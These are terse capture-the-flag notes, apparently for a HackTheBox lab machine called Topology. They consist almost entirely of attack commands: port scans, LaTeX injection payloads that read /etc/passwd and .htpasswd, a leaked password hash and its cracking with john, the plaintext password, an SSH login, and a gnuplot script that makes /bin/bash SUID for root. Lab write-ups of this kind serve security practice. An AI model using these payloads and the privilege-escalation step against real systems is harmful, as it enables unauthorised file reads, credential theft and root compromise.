rustscan -a 10.10.11.217 -r 0-65535 --ulimit 5000
nmap -Pn -sC -sV -p 22,80 10.10.11.217
Subdomain
http://latex.topology.htb/
Latex Injection LFI
$\lstinputlisting{/etc/passwd}$
$\lstinputlisting{/var/www/dev/.htaccess}$
$\lstinputlisting{/var/www/dev/.htpasswd}$
Credentials:
vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
Crack Password
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
Cracked Password: calculus20
SSH
ssh vdaisley@10.10.11.217
Privilege Escalation
echo "system 'chmod u+s /bin/bash'" > /opt/gnuplot/payload.plt
/bin/bash -p